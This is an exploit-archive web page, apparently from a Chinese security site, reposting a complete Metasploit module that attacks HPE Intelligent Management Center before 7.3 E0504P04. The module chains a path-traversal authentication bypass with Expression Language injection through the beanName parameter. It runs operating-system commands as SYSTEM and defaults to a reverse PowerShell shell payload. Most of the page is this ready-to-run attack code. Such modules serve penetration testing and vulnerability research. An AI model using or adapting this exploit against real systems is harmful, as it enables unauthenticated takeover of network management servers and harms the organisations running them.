首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HPE iMC 7.3 - Remote Code Execution (Metasploit)
来源:metasploit.com 作者:TrendyTofu 发布时间:2018-05-22  
# Exploit Title: HPE iMC EL Injection Unauthenticated RCE
# Date: 6 February, 2018
# Exploit Author: TrendyTofu
# Vendor Homepage: https://www.hpe.com/us/en/home.html
# Software Link: http://h10145.www1.hpe.com/Downloads/SoftwareReleases.aspx?ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535
# Version: prior to 7.3 E0504P04
# Tested on: iMC PLAT v7.3 (E0504P02), Windows Server 2012R2 x64 (EN)
# CVE : CVE-2017-8982, CVE-2017-12500
# Reference:
https://www.thezdi.com/blog/2018/2/6/one-mans-patch-is-another-mans-treasure-a-tale-of-a-failed-hpe-patch
 
Metasploit module also hosted on Github.  Posted below for reference:
https://raw.githubusercontent.com/thezdi/scripts/master/msf/hp_imc_el_injection_rce.rb
 
 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HPE iMC EL Injection Unauthenticated RCE',
      'Description'    => %q{
        This module exploits an expression language injection
vulnerablity, along with
        an authentication bypass vulnerability in Hewlett Packard
Enterprise Intelligent
        Management Center before version 7.3 E0504P04 to achieve
remote code execution.
 
        The HP iMC server suffers from multiple vulnerabilities allows
unauthenticated
        attacker to execute arbitrary Expression Language via the
beanName parameter,
        allowing execution of arbitrary operating system commands as
SYSTEM. This service
        listens on TCP port 8080 and 8443 by default.
 
        This module has been tested successfully on iMC PLAT v7.3
(E0504P02) on Windows
        2k12r2 x64 (EN).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr_me', # Discovery
          'trendytofu' # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2017-8982'],
          ['ZDI', '18-139'],
          ['URL',
'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03809en_us'],
          ['CVE', '2017-12500'],
          ['ZDI', '17-663'],
          ['URL',
'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03768en_us']
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_CMD,
      'Targets'        => [
                            [ 'Windows',
                              {
                                'Arch' => [ ARCH_CMD],
                                'Platform' => 'win'
                              }
                            ]
                          ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jan 25 2018',
      'DefaultOptions' =>
        {
          'Payload' => 'cmd/windows/reverse_powershell'
        },
      'DefaultTarget'  => 0))
    register_options [Opt::RPORT(8080)]
  end
 
  def check
    res = send_request_raw({'uri'  => '/imc/login.jsf' })
 
    return CheckCode::Detected if res && res.code == 200
 
    CheckCode::Unknown
  end
 
  def get_payload(cmd)
    %q|facesContext.getExternalContext().redirect(%22%22.getClass().forName(%22javax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22JavaScript%22).eval(%22var%20proc=new%20java.lang.ProcessBuilder[%5C%22(java.lang.String[])%5C%22]([%5C%22cmd.exe%5C%22,%5C%22/c%5C%22,%5C%22|+cmd+%q|%5C%22]).start();%22))|
  end
 
  def execute_command(payload)
    res = send_request_raw({ 'uri' =>
"/imc/primepush/%2e%2e/ict/export/ictExpertDownload.xhtml?beanName=#{payload}"
})
    fail_with(Msf::Module::Failure::UnexpectedReply, "Injection
failed") if res && res.code != 302
    print_good "Command injected successfully!"
  end
 
  def exploit
    cmd = payload.encoded
    cmd.gsub!('cmd.exe /c ','')
    cmd = Rex::Text.uri_encode(cmd)
 
    print_status "Sending payload..."
    execute_command get_payload cmd
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·AF_PACKET packet_set_ring Priv
·Prime95 29.4b8 - Stack Buffer
·Apache Struts 2 - Struts 1 Plu
·Jenkins CLI - HTTP Java Deseri
·Linux < 4.16.9 / < 4.14.41 - 4
·Nanopool Claymore Dual Miner 7
·Intelbras NCLOUD 300 1.0 - Aut
·Inteno IOPSYS 2.0 < 4.2.0 - 'p
·WhatsApp 2.18.31 iOS Memory Co
·2345 Security Guard 3.7 - '234
·Libuser roothelper Privilege E
·Microsoft Windows 2003 SP2 - '
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved